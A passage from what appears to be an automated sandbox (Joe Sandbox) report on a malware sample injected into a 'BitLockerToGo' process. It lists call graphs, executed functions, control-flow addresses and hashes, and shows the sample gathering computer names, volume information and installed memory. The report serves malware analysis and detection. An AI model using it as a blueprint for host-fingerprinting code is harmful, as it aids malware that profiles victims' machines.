11683->11679 11683->11683 11688 2d28e70 LdrInitializeThunk 11683->11688 11685 2d0fdde 11684->11685 11686 2d0fc49 11684->11686 11685->11673 11687 2d0aa10 LdrInitializeThunk 11686->11687 11687->11685 11688->11679 11689 2d07ae2 11690 2d07b49 11689->11690 11690->11690 11691 2d0aa10 LdrInitializeThunk 11690->11691 11692 2d07e0e 11691->11692 11861 2d0e368 11862 2d0e387 11861->11862 11863 2d2c6b0 2 API calls 11862->11863 11864 2d0e3ac 11863->11864 11693 2d031ea 11694 2d031f9 11693->11694 11699 2d051c0 11694->11699 11696 2d03215 11697 2cf9e70 RtlExpandEnvironmentStrings 11696->11697 11698 2d0321f 11697->11698 11700 2d051e0 11699->11700 11700->11700 11701 2d051ea RtlExpandEnvironmentStrings 11700->11701 11702 2d0521e 11701->11702 11703 2d0522e RtlExpandEnvironmentStrings 11702->11703 11704 2d052bf 11703->11704 11704->11704 11705 2d2bc60 LdrInitializeThunk 11704->11705 11706 2d053aa 11705->11706 11865 2d0616b 11866 2d2c130 LdrInitializeThunk 11865->11866 11867 2d06175 11866->11867 11868 2d2c130 LdrInitializeThunk 11867->11868 11869 2d0618a 11868->11869 11870 2d1f713 11871 2d1f718 11870->11871 11872 2d1f7af KiUserCallbackDispatcher GetSystemMetrics 11871->11872 11873 2d1f7f6 DeleteObject 11872->11873 11875 2d1f855 SelectObject 11873->11875 11877 2d1f914 SelectObject 11875->11877 11878 2d1f940 DeleteObject 11877->11878 11880 2d1f98f 11878->11880 11886 2d0281c 11887 2d0282b 11886->11887 11896 2d07e70 11887->11896 11889 2d02851 11890 2cf9e70 RtlExpandEnvironmentStrings 11889->11890 11891 2d0285b 11890->11891 11892 2d07e70 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 11891->11892 11893 2d0289e 11892->11893 11894 2cf9e70 RtlExpandEnvironmentStrings 11893->11894 11895 2d028ad 11894->11895 11897 2d07e90 11896->11897 11897->11897 11898 2d07e9b RtlExpandEnvironmentStrings 11897->11898 11899 2d07eb8 11898->11899 11900 2d07ec8 RtlExpandEnvironmentStrings 11899->11900 11901 2d2be30 LdrInitializeThunk 11900->11901 11902 2d07ee9 11901->11902 11710 2d1119f 11711 2d112dc RtlExpandEnvironmentStrings 11710->11711 11712 2d1128f 11710->11712 11713 2d11315 11711->11713 11712->11711 11714 2d11d30 RtlExpandEnvironmentStrings 11713->11714 11715 2d2bc60 LdrInitializeThunk 11714->11715 11716 2d11d5f 11715->11716 11717 2d28b9d 11718 2d28c08 LoadLibraryW 11717->11718 11720 2d0c480 11721 2d0c48c 11720->11721 11723 2d0c4df 11720->11723 11721->11721 11722 2d0aa10 LdrInitializeThunk 11721->11722 11722->11723 11907 2d0a300 11908 2d0a30e 11907->11908 11911 2d0a350 11907->11911 11913 2d0a410 11908->11913 11910 2d0a3cc 11910->11911 11912 2d08080 LdrInitializeThunk 11910->11912 11912->11911 11914 2d0a490 11913->11914 11914->11914 11915 2d2be30 LdrInitializeThunk 11914->11915 11916 2d0a59d 11915->11916 11927 2d05d07 11929 2d05d0d 11927->11929 11928 2d05dbe 11929->11928 11931 2d28e70 LdrInitializeThunk 11929->11931 11931->11928 11728 2d24d8c 11731 2d2b010 11728->11731 11730 2d24daf GetVolumeInformationW 11932 2d0490e 11933 2d0491d 11932->11933 11934 2cf9e70 RtlExpandEnvironmentStrings 11933->11934 11935 2d0492d 11934->11935 11978 2d0df00 11935->11978 11937 2d04942 11938 2cf9e70 RtlExpandEnvironmentStrings 11937->11938 11939 2d0494c 11938->11939 11940 2d0e170 LdrInitializeThunk 11939->11940 11941 2d04961 11940->11941 11942 2cf9e70 RtlExpandEnvironmentStrings 11941->11942 11943 2d0496b 11942->11943 11944 2d10ad0 RtlAllocateHeap LdrInitializeThunk 11943->11944 11945 2d04989 11944->11945 11946 2d10fa0 RtlAllocateHeap LdrInitializeThunk 11945->11946 11947 2d04992 11946->11947 11948 2cf9e70 RtlExpandEnvironmentStrings 11947->11948 11949 2d0499c 11948->11949 11950 2d13920 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings 11949->11950 11951 2d049b1 11950->11951 11952 2cf9e70 RtlExpandEnvironmentStrings 11951->11952 11953 2d049bb 11952->11953 11954 2d1e8e0 6 API calls 11953->11954 11955 2d049d9 11954->11955 11956 2cf9e70 RtlExpandEnvironmentStrings 11955->11956 11957 2d04a8a 11956->11957 11958 2d0df00 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 11957->11958 11959 2d04a9f 11958->11959 11960 2cf9e70 RtlExpandEnvironmentStrings 11959->11960 11961 2d04aa9 11960->11961 11962 2d0e170 LdrInitializeThunk 11961->11962 11963 2d04abe 11962->11963 11964 2cf9e70 RtlExpandEnvironmentStrings 11963->11964 11965 2d04ac8 11964->11965 11966 2d10ad0 RtlAllocateHeap LdrInitializeThunk 11965->11966 11967 2d04ae6 11966->11967 11968 2d10fa0 RtlAllocateHeap LdrInitializeThunk 11967->11968 11969 2d04aef 11968->11969 11970 2cf9e70 RtlExpandEnvironmentStrings 11969->11970 11971 2d04af9 11970->11971 11972 2d13920 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings 11971->11972 11973 2d04b0e 11972->11973 11974 2cf9e70 RtlExpandEnvironmentStrings 11973->11974 11975 2d04b18 11974->11975 11976 2d1e8e0 6 API calls 11975->11976 11977 2d04b36 11976->11977 11979 2d0dfc3 11978->11979 11980 2d0e00a RtlExpandEnvironmentStrings 11978->11980 11979->11980 11981 2d0e04c 11980->11981 11982 2d0e05c RtlExpandEnvironmentStrings 11981->11982 11983 2d0e0e4 11982->11983 11984 2d07e70 3 API calls 11983->11984 11985 2d0e143 11984->11985 11732 2cf9390 11734 2cf939a 11732->11734 11733 2cf93f6 ExitProcess 11735 2cf93bb GetConsoleWindow 11734->11735 11736 2cf93ae 11734->11736 11735->11736 11736->11733 11986 2d17635 11988 2d17641 11986->11988 11987 2d178e6 GetPhysicallyInstalledSystemMemory 11987->11988 11988->11987 11741 2d299b8 11743 2d298d1 11741->11743 11742 2d2997e 11743->11742 11743->11743 11745 2d28e70 LdrInitializeThunk 11743->11745 11745->11742 11989 2d0633e 11990 2d063b9 11989->11990 11990->11990 11991 2d2bc60 LdrInitializeThunk 11990->11991 11992 2d064ad 11991->11992 11993 2d2bc60 LdrInitializeThunk 11992->11993 11993->11992 11998 2d1a923 11999 2d1a9d4 SysAllocString 11998->11999 12001 2d1a9ac 11998->12001 12000 2d1aa35 11999->12000 12001->11999 11746 2d098a3 11747 2d2c130 LdrInitializeThunk 11746->11747 11748 2d098be 11747->11748 11749 2d292a1 11750 2d29239 11749->11750 11752 2d2925e 11750->11752 11755 2d28e70 LdrInitializeThunk 11750->11755 11754 2d28e70 LdrInitializeThunk 11752->11754 11754->11752 11755->11752 11756 2d06da6 11757 2d06dd2 11756->11757 11770 2d04d70 11757->11770 11759 2d06e12 11760 2d04d70 LdrInitializeThunk 11759->11760 11761 2d06ea3 11760->11761 11762 2d04d70 LdrInitializeThunk 11761->11762 11763 2d06f6c 11762->11763 11764 2d04d70 LdrInitializeThunk 11763->11764 11765 2d07019 11764->11765 11766 2d24fe0 RtlAllocateHeap LdrInitializeThunk 11765->11766 11767 2d071c3 11766->11767 11768 2d04d70 LdrInitializeThunk 11767->11768 11769 2d071d8 11768->11769 11771 2d04d90 11770->11771 11771->11771 11772 2d2bc60 LdrInitializeThunk 11771->11772 11773 2d04e4a 11772->11773 11774 2d28daf 11775 2d28e33 RtlReAllocateHeap 11774->11775 11776 2d28df4 11774->11776 11777 2d28e5f 11775->11777 11776->11775

                                                              Executed Functions

                                                              Function 02D1F713 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 218COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                              • String ID:
                                                              • API String ID: 1449868515-3916222277
                                                              • Opcode ID: 1ef960be1ff11526231f9e0eb4c0a9ae70b112f49b6df5712fcb292756b2d7e3
                                                              • Instruction ID: fcc1faa18083c9380fa0df4ade78b602cb2483e911d00d933a34c99e48ed44f0
                                                              • Opcode Fuzzy Hash: 1ef960be1ff11526231f9e0eb4c0a9ae70b112f49b6df5712fcb292756b2d7e3
                                                              • Instruction Fuzzy Hash: 03A16BB4A14B008FD364DF2CD585A26BBF1FB49700B108A6DE99AC7B60D731B845CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF1750 Relevance: 10.6, Strings: 8, Instructions: 594COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$.$0$[$false$null$true${
                                                              • API String ID: 0-1639024219
                                                              • Opcode ID: 7402a38e10901c23d1dff2bd5ee4ba10f5d9c518661c5b84a7f21568ae438ca8
                                                              • Instruction ID: 7bec225b00aacd30c2f9430787aadab6882e3fdf603892abd16d2d598832c58f
                                                              • Opcode Fuzzy Hash: 7402a38e10901c23d1dff2bd5ee4ba10f5d9c518661c5b84a7f21568ae438ca8
                                                              • Instruction Fuzzy Hash: C51214B4A00346DBEBD05F25DD44726BBE5AF80358F0D8538DA8E87282F7B5D614CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CF9E70 Relevance: 7.9, Strings: 6, Instructions: 418COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 275 2cf9e70-2cf9e83 276 2cf9e85-2cf9e91 275->276 277 2cf9ec1-2cf9ec3 275->277 278 2cf9ec8-2cf9ed5 276->278 279 2cf9e93-2cf9e95 276->279 280 2cfa4ff-2cfa508 277->280 283 2cf9f0c-2cf9f89 call 2cf6b00 call 2d24c20 call 2cf8b30 278->283 281 2cf9ed7-2cf9ede 279->281 282 2cf9e97-2cf9ebf 279->282 284 2cf9ee0-2cf9ef5 281->284 285 2cf9ef7-2cf9f07 281->285 282->284 292 2cf9f8b 283->292 293 2cf9fb5-2cfa00c call 2cf96c0 283->293 284->283 285->283 294 2cf9f90-2cf9fb3 292->294 297 2cfa04f-2cfa090 call 2cf96c0 293->297 298 2cfa00e-2cfa00f 293->298 294->293 294->294 302 2cfa0d9-2cfa12a call 2cf96c0 297->302 303 2cfa092 297->303 299 2cfa010-2cfa04d 298->299 299->297 299->299 307 2cfa12c-2cfa12f 302->307 308 2cfa168-2cfa1a6 302->308 304 2cfa0a0-2cfa0d7 303->304 304->302 304->304 309 2cfa130-2cfa166 307->309 310 2cfa1df-2cfa230 call 2cf96c0 308->310 311 2cfa1a8 308->311 309->308 309->309 315 2cfa265-2cfa402 call 2cf99c0 310->315 316 2cfa232 310->316 312 2cfa1b0-2cfa1dd 311->312 312->310 312->312 320 2cfa44d-2cfa48a 315->320 321 2cfa404 315->321 317 2cfa240-2cfa263 316->317 317->315 317->317 323 2cfa48c-2cfa48f 320->323 324 2cfa4ca-2cfa4ea call 2cfdf60 call 2cf8b40 320->324 322 2cfa410-2cfa44b 321->322 322->320 322->322 325 2cfa490-2cfa4c8 323->325 329 2cfa4ef-2cfa4f8 324->329 325->324 325->325 329->280
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &$>&$*$0$1N$Ar$M-
                                                              • API String ID: 0-3759687519
                                                              • Opcode ID: b2ff3f3caecfca53e7fa99681c275eecf9fabe6f2c525676131829a1ea30a565
                                                              • Instruction ID: 309a2b067a1ff5145c42b2c6b1631c072e08b88c7676e7a70e73b3cb9849badc
                                                              • Opcode Fuzzy Hash: b2ff3f3caecfca53e7fa99681c275eecf9fabe6f2c525676131829a1ea30a565
                                                              • Instruction Fuzzy Hash: 99020FB05083818BE364CF14C494B6BBBF2BBC6348F148D1CE6D54B292D77A9909CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D16644 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 667COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 330 2d16644-2d1665b 332 2d166b6-2d166c5 330->332 333 2d1665d-2d16674 330->333 336 2d16711-2d16712 332->336 334 2d166c7 333->334 335 2d16676 333->335 339 2d166c9-2d166d0 334->339 338 2d16680-2d166b2 335->338 337 2d16720-2d16729 336->337 337->337 340 2d1672b-2d167a4 337->340 338->338 341 2d166b4 338->341 342 2d166d2-2d166e2 339->342 343 2d166ed-2d1670b 339->343 344 2d167a6 340->344 345 2d167f8-2d16801 340->345 341->339 346 2d166e4-2d166eb 342->346 347 2d1670d-2d1670f 342->347 343->346 343->347 348 2d167b0-2d167f6 344->348 349 2d16803-2d16809 345->349 350 2d1681b-2d16827 345->350 346->336 347->336 347->340 348->345 348->348 351 2d16810-2d16819 349->351 352 2d16829-2d1682f 350->352 353 2d1683b-2d16846 350->353 351->350 351->351 354 2d16830-2d16839 352->354 356 2d16851-2d168e4 call 2d2b010 353->356 357 2d16848-2d1684e call 2cf8b40 353->357 354->353 354->354 363 2d16941-2d1694a 356->363 364 2d168e6 356->364 357->356 366 2d1696b-2d16977 363->366 367 2d1694c-2d16952 363->367 365 2d168f0-2d1693f 364->365 365->363 365->365 369 2d16979-2d1697f 366->369 370 2d1698b-2d169aa call 2d2b010 366->370 368 2d16960-2d16969 367->368 368->366 368->368 371 2d16980-2d16989 369->371 373 2d169af-2d169bf 370->373 371->370 371->371 374 2d169c2-2d16a21 373->374 375 2d16a23 374->375 376 2d16a78-2d16a81 374->376 377 2d16a30-2d16a76 375->377 378 2d16a83-2d16a89 376->378 379 2d16a9b-2d16aa7 376->379 377->376 377->377 380 2d16a90-2d16a99 378->380 381 2d16aa9-2d16aaf 379->381 382 2d16abb-2d16ac9 call 2d2b010 379->382 380->379 380->380 383 2d16ab0-2d16ab9 381->383 385 2d16ace-2d16b45 GetComputerNameExA 382->385 383->382 383->383 386 2d16b93-2d16b9c 385->386 387 2d16b47 385->387 388 2d16bbb-2d16bc7 386->388 389 2d16b9e-2d16ba4 386->389 390 2d16b50-2d16b91 387->390 392 2d16bc9-2d16bcf 388->392 393 2d16bdb-2d16c59 GetComputerNameExA 388->393 391 2d16bb0-2d16bb9 389->391 390->386 390->390 391->388 391->391 394 2d16bd0-2d16bd9 392->394 395 2d16ca8-2d16cb1 393->395 396 2d16c5b 393->396 394->393 394->394 398 2d16cb3-2d16cb9 395->398 399 2d16ccb-2d16cd7 395->399 397 2d16c60-2d16ca6 396->397 397->395 397->397 400 2d16cc0-2d16cc9 398->400 401 2d16cd9-2d16cdf 399->401 402 2d16ceb-2d16d7a 399->402 400->399 400->400 403 2d16ce0-2d16ce9 401->403 405 2d16dd2-2d16ddb 402->405 406 2d16d7c-2d16d7f 402->406 403->402 403->403 408 2d16dfb-2d16e07 405->408 409 2d16ddd-2d16de3 405->409 407 2d16d80-2d16dd0 406->407 407->405 407->407 411 2d16e09-2d16e0f 408->411 412 2d16e1b-2d16e9d call 2d2b010 408->412 410 2d16df0-2d16df9 409->410 410->408 410->410 413 2d16e10-2d16e19 411->413 417 2d16ef6-2d16eff 412->417 418 2d16e9f 412->418 413->412 413->413 419 2d16f01-2d16f07 417->419 420 2d16f1b-2d16f2f 417->420 421 2d16ea0-2d16ef4 418->421 422 2d16f10-2d16f19 419->422 423 2d16f59-2d16f65 420->423 421->417 421->421 422->420 422->422 424 2d16ffb-2d16ffe 423->424 425 2d16f6b-2d16f72 423->425 428 2d17002-2d17064 424->428 426 2d16f40-2d16f45 425->426 427 2d16f74-2d16f8f 425->427 429 2d16f4a-2d16f53 426->429 430 2d16f91-2d16f94 427->430 431 2d16fc0-2d16fc8 427->431 432 2d170c3-2d170cc 428->432 433 2d17066 428->433 429->423 434 2d17000 429->434 430->431 436 2d16f96-2d16fb3 430->436 431->429 435 2d16fca-2d16ff6 431->435 438 2d170eb-2d170ee call 2d1c070 432->438 439 2d170ce-2d170d4 432->439 437 2d17070-2d170c1 433->437 434->428 435->429 436->429 437->432 437->437 442 2d170f3-2d1710f 438->442 440 2d170e0-2d170e9 439->440 440->438 440->440
                                                              APIs
                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02D16AF4
                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 02D16BFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: ComputerName
                                                              • String ID: CFZA$jLB
                                                              • API String ID: 3545744682-1295935614
                                                              • Opcode ID: da00a0835e08387636e3cf2447087f66bc6811799a83427c9953aa9fcc3fc6be
                                                              • Instruction ID: 6376f82faea7e6ec3f88634beac5979cfc2154617f036954069fa7b14442543e
                                                              • Opcode Fuzzy Hash: da00a0835e08387636e3cf2447087f66bc6811799a83427c9953aa9fcc3fc6be
                                                              • Instruction Fuzzy Hash: C0328F70145B808AE739CF34C494BE3BBE5BF16309F44499DC4EA8B782D77AA509CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D16647 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 655COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 443 2d16647-2d1665b 445 2d166b6-2d166c5 443->445 446 2d1665d-2d16674 443->446 449 2d16711-2d16712 445->449 447 2d166c7 446->447 448 2d16676 446->448 452 2d166c9-2d166d0 447->452 451 2d16680-2d166b2 448->451 450 2d16720-2d16729 449->450 450->450 453 2d1672b-2d167a4 450->453 451->451 454 2d166b4 451->454 455 2d166d2-2d166e2 452->455 456 2d166ed-2d1670b 452->456 457 2d167a6 453->457 458 2d167f8-2d16801 453->458 454->452 459 2d166e4-2d166eb 455->459 460 2d1670d-2d1670f 455->460 456->459 456->460 461 2d167b0-2d167f6 457->461 462 2d16803-2d16809 458->462 463 2d1681b-2d16827 458->463 459->449 460->449 460->453 461->458 461->461 464 2d16810-2d16819 462->464 465 2d16829-2d1682f 463->465 466 2d1683b-2d16846 463->466 464->463 464->464 467 2d16830-2d16839 465->467 469 2d16851-2d168e4 call 2d2b010 466->469 470 2d16848-2d1684e call 2cf8b40 466->470 467->466 467->467 476 2d16941-2d1694a 469->476 477 2d168e6 469->477 470->469 479 2d1696b-2d16977 476->479 480 2d1694c-2d16952 476->480 478 2d168f0-2d1693f 477->478 478->476 478->478 482 2d16979-2d1697f 479->482 483 2d1698b-2d16a21 call 2d2b010 479->483 481 2d16960-2d16969 480->481 481->479 481->481 484 2d16980-2d16989 482->484 488 2d16a23 483->488 489 2d16a78-2d16a81 483->489 484->483 484->484 490 2d16a30-2d16a76 488->490 491 2d16a83-2d16a89 489->491 492 2d16a9b-2d16aa7 489->492 490->489 490->490 493 2d16a90-2d16a99 491->493 494 2d16aa9-2d16aaf 492->494 495 2d16abb-2d16b45 call 2d2b010 GetComputerNameExA 492->495 493->492 493->493 496 2d16ab0-2d16ab9 494->496 499 2d16b93-2d16b9c 495->499 500 2d16b47 495->500 496->495 496->496 501 2d16bbb-2d16bc7 499->501 502 2d16b9e-2d16ba4 499->502 503 2d16b50-2d16b91 500->503 505 2d16bc9-2d16bcf 501->505 506 2d16bdb-2d16c59 GetComputerNameExA 501->506 504 2d16bb0-2d16bb9 502->504 503->499 503->503 504->501 504->504 507 2d16bd0-2d16bd9 505->507 508 2d16ca8-2d16cb1 506->508 509 2d16c5b 506->509 507->506 507->507 511 2d16cb3-2d16cb9 508->511 512 2d16ccb-2d16cd7 508->512 510 2d16c60-2d16ca6 509->510 510->508 510->510 513 2d16cc0-2d16cc9 511->513 514 2d16cd9-2d16cdf 512->514 515 2d16ceb-2d16d7a 512->515 513->512 513->513 516 2d16ce0-2d16ce9 514->516 518 2d16dd2-2d16ddb 515->518 519 2d16d7c-2d16d7f 515->519 516->515 516->516 521 2d16dfb-2d16e07 518->521 522 2d16ddd-2d16de3 518->522 520 2d16d80-2d16dd0 519->520 520->518 520->520 524 2d16e09-2d16e0f 521->524 525 2d16e1b-2d16e9d call 2d2b010 521->525 523 2d16df0-2d16df9 522->523 523->521 523->523 526 2d16e10-2d16e19 524->526 530 2d16ef6-2d16eff 525->530 531 2d16e9f 525->531 526->525 526->526 532 2d16f01-2d16f07 530->532 533 2d16f1b-2d16f2f 530->533 534 2d16ea0-2d16ef4 531->534 535 2d16f10-2d16f19 532->535 536 2d16f59-2d16f65 533->536 534->530 534->534 535->533 535->535 537 2d16ffb-2d16ffe 536->537 538 2d16f6b-2d16f72 536->538 541 2d17002-2d17064 537->541 539 2d16f40-2d16f45 538->539 540 2d16f74-2d16f8f 538->540 542 2d16f4a-2d16f53 539->542 543 2d16f91-2d16f94 540->543 544 2d16fc0-2d16fc8 540->544 545 2d170c3-2d170cc 541->545 546 2d17066 541->546 542->536 547 2d17000 542->547 543->544 549 2d16f96-2d16fb3 543->549 544->542 548 2d16fca-2d16ff6 544->548 551 2d170eb-2d170ee call 2d1c070 545->551 552 2d170ce-2d170d4 545->552 550 2d17070-2d170c1 546->550 547->541 548->542 549->542 550->545 550->550 555 2d170f3-2d1710f 551->555 553 2d170e0-2d170e9 552->553 553->551 553->553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CFZA$jLB
                                                              • API String ID: 0-1295935614
                                                              • Opcode ID: d9293608b8eb3036a9af5adf0f84f212e8739b2896d948e3135ac176e024b153
                                                              • Instruction ID: 7669cf58a63e6ce5142e0be1aef8f7456851ed583ba706f6066a79f0464df7ba
                                                              • Opcode Fuzzy Hash: d9293608b8eb3036a9af5adf0f84f212e8739b2896d948e3135ac176e024b153
                                                              • Instruction Fuzzy Hash: 29327C70145B808AE739CF34C494BE3BBE5BF16309F48499DC0EA8B782D77AA505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02D15F0E Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 616COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 556 2d15f0e-2d16846 558 2d16851-2d168e4 call 2d2b010 556->558 559 2d16848-2d1684e call 2cf8b40 556->559 565 2d16941-2d1694a 558->565 566 2d168e6 558->566 559->558 568 2d1696b-2d16977 565->568 569 2d1694c-2d16952 565->569 567 2d168f0-2d1693f 566->567 567->565 567->567 571 2d16979-2d1697f 568->571 572 2d1698b-2d169aa call 2d2b010 568->572 570 2d16960-2d16969 569->570 570->568 570->570 573 2d16980-2d16989 571->573 575 2d169af-2d169bf 572->575 573->572 573->573 576 2d169c2-2d16a21 575->576 577 2d16a23 576->577 578 2d16a78-2d16a81 576->578 579 2d16a30-2d16a76 577->579 580 2d16a83-2d16a89 578->580 581 2d16a9b-2d16aa7 578->581 579->578 579->579 582 2d16a90-2d16a99 580->582 583 2d16aa9-2d16aaf 581->583 584 2d16abb-2d16ac9 call 2d2b010 581->584 582->581 582->582 585 2d16ab0-2d16ab9 583->585 587 2d16ace-2d16b45 GetComputerNameExA 584->587 585->584 585->585 588 2d16b93-2d16b9c 587->588 589 2d16b47 587->589 590 2d16bbb-2d16bc7 588->590 591 2d16b9e-2d16ba4 588->591 592 2d16b50-2d16b91 589->592 594 2d16bc9-2d16bcf 590->594 595 2d16bdb-2d16c59 GetComputerNameExA 590->595 593 2d16bb0-2d16bb9 591->593 592->588 592->592 593->590 593->593 596 2d16bd0-2d16bd9 594->596 597 2d16ca8-2d16cb1 595->597 598 2d16c5b 595->598 596->595 596->596 600 2d16cb3-2d16cb9 597->600 601 2d16ccb-2d16cd7 597->601 599 2d16c60-2d16ca6 598->599 599->597 599->599 602 2d16cc0-2d16cc9 600->602 603 2d16cd9-2d16cdf 601->603 604 2d16ceb-2d16d7a 601->604 602->601 602->602 605 2d16ce0-2d16ce9 603->605 607 2d16dd2-2d16ddb 604->607 608 2d16d7c-2d16d7f 604->608 605->604 605->605 610 2d16dfb-2d16e07 607->610 611 2d16ddd-2d16de3 607->611 609 2d16d80-2d16dd0 608->609 609->607 609->609 613 2d16e09-2d16e0f 610->613 614 2d16e1b-2d16e9d call 2d2b010 610->614 612 2d16df0-2d16df9 611->612 612->610 612->612 615 2d16e10-2d16e19 613->615 619 2d16ef6-2d16eff 614->619 620 2d16e9f 614->620 615->614 615->615 621 2d16f01-2d16f07 619->621 622 2d16f1b-2d16f2f 619->622 623 2d16ea0-2d16ef4 620->623 624 2d16f10-2d16f19 621->624 625 2d16f59-2d16f65 622->625 623->619 623->623 624->622 624->624 626 2d16ffb-2d16ffe 625->626 627 2d16f6b-2d16f72 625->627 630 2d17002-2d17064 626->630 628 2d16f40-2d16f45 627->628 629 2d16f74-2d16f8f 627->629 631 2d16f4a-2d16f53 628->631 632 2d16f91-2d16f94 629->632 633 2d16fc0-2d16fc8 629->633 634 2d170c3-2d170cc 630->634 635 2d17066 630->635 631->625 636 2d17000 631->636 632->633 638 2d16f96-2d16fb3 632->638 633->631 637 2d16fca-2d16ff6 633->637 640 2d170eb-2d170ee call 2d1c070 634->640 641 2d170ce-2d170d4 634->641 639 2d17070-2d170c1 635->639 636->630 637->631 638->631 639->634 639->639 644 2d170f3-2d1710f 640->644 642 2d170e0-2d170e9 641->642 642->640 642->642
                                                              APIs
                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02D16AF4
                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 02D16BFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: ComputerName
                                                              • String ID: CFZA$jLB
                                                              • API String ID: 3545744682-1295935614
                                                              • Opcode ID: e3d99593c65291955cecab98ec7805857886bbe456d023d992532c7d9180e2fa
                                                              • Instruction ID: 614ca49eb7295f4eae05807fef26841c293a8f7630cb5f3cfcc4c8affed42009
                                                              • Opcode Fuzzy Hash: e3d99593c65291955cecab98ec7805857886bbe456d023d992532c7d9180e2fa
                                                              • Instruction Fuzzy Hash: F4326B70145B809AE729CF34C4A0BE3BBE5BF16308F44499DD4EB8B782D77AA505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02CFAB00 Relevance: 6.7, Strings: 5, Instructions: 471COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 651 2cfab00-2cfab56 652 2cfab58 651->652 653 2cfaba2-2cfacf6 651->653 654 2cfab60-2cfaba0 652->654 655 2cfacf8 653->655 656 2cfad45-2cfad9d 653->656 654->653 654->654 657 2cfad00-2cfad43 655->657 658 2cfad9f 656->658 659 2cfade2-2cfadf3 call 2cfb220 656->659 657->656 657->657 660 2cfada0-2cfade0 658->660 662 2cfadf8-2cfadfd 659->662 660->659 660->660 663 2cfaf76-2cfaf78 662->663 664 2cfae03-2cfae46 662->664 667 2cfb1d3-2cfb1dc 663->667 665 2cfae88-2cfae8f 664->665 666 2cfae48 664->666 669 2cfae90-2cfae9a 665->669 668 2cfae50-2cfae86 666->668 668->665 668->668 670 2cfae9c-2cfae9f 669->670 671 2cfaea1-2cfaea5 669->671 670->669 670->671 672 2cfaeab-2cfaefa 671->672 673 2cfb1ca-2cfb1d0 call 2d26b80 671->673 674 2cfaefc-2cfaeff 672->674 675 2cfaf37-2cfaf44 672->675 673->667 677 2cfaf00-2cfaf35 674->677 678 2cfaf7d-2cfaf7f 675->678 679 2cfaf46-2cfaf4e 675->679 677->675 677->677 682 2cfb096-2cfb098 678->682 683 2cfaf85-2cfafdf 678->683 681 2cfaf57-2cfaf5b 679->681 681->682 684 2cfaf61-2cfaf68 681->684 682->673 685 2cfb02d-2cfb05a 683->685 686 2cfafe1 683->686 687 2cfaf6e 684->687 688 2cfaf6a-2cfaf6c 684->688 690 2cfb09d 685->690 691 2cfb05c-2cfb060 685->691 689 2cfaff0-2cfb02b 686->689 692 2cfaf50-2cfaf55 687->692 693 2cfaf70-2cfaf74 687->693 688->687 689->685 689->689 694 